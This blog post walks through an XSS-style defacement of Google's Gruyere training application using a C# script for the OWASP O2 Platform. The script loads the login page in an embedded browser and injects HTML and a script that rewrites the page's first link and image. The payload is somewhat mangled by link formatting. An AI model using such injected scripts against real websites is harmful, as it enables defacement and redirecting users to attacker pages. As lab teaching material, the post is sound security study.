XSS with 02 script editor Defacement on Gruyere
Today’s post is going to go through step by step on Gruyere XSS defacement.
We already created our XSS builder with 02. Now we are going to do a XSS defacement.
Above is the regular Gruyere Login page. Below is Defacement with the IE Script Execution.
Here is all the code needed for the defacement.
using O2.XRules.Database.Utils;
using O2.XRules.Database.APIs;
using O2.External.SharpDevelop.Ascx;
using O2.External.SharpDevelop.ExtensionMethods;
using O2.DotNetWrappers.Network;
using O2.DotNetWrappers.DotNet;
using O2.DotNetWrappers.Windows;
using O2.DotNetWrappers.ExtensionMethods;
using O2.Views.ASCX.classes.MainGUI;
using O2.Views.ASCX.CoreControls;
using O2.Views.ASCX.ExtensionMethods;
using O2.Kernel.ExtensionMethods;
using O2.Kernel;
using O2.Interfaces;
using System.Linq;
using System.Xml.Linq;
using System.Xml;
using System.Collections.Generic;
using System.Windows.Forms;
using System.Drawing;
using System;
using O2.XRules.Database.Utils.O2;
public class DynamicType
{
public void dynamicMethod(object returnData, System.Windows.Forms.Panel panel)
{
panel.clear();
var ie = panel.add_IE().silent(true);
ie.open("http://google-gruyere.appspot.com/856783677371/login");
var target = ie.elements("DIV").str("Gruyere: Login");
target.flash();
target.injectHtml("beforeBegin", "<h1>O2 Platform Demos</h1>" + "The best way to learn about the security vulnerabilities of this website is to use the <a href=\"http://o2platform\">OWASP O2 Platform</a>" + "<script DEFER> " + " //alert(document.links[0].href);" + " document.links[0].href = \"http://o2platform.com\";" + " document.images[0].src =\" <a href="http://o2platform.com/images/a/">http://o2platform.com/images/a/</a> " + "a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";" + " //alert(document.images[0].sec);" + " //document.images[1].href = " + " //alert(document.images[1].href);" + "</script>");
}
}
//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll
This is what Dinis Created and what is under the hood of these little scripts. It’s a bit more complex.
I was speaking to Dinis and in his own words after I questioned him about the code he explained some of it too me.
what happens when you select the ‘show/hide generated source code’ is that you see the actual method that gets compiled (basicaly I automatically put the text you put on the main script window inside that public object dynamicMethod(object returnData, string testString, int testNumber) method
– the silent(true) in IE is just to prevent pop-ups (and sometimes you need to put it to false since you need to act on those popups)
– the ‘flash()’ method is used to slow down a little bit the script execution and so that you can see visually which HTML field is being edited
If you have any questions e-mail me. Matt Parsons, CISSP, MSM
Leave a Reply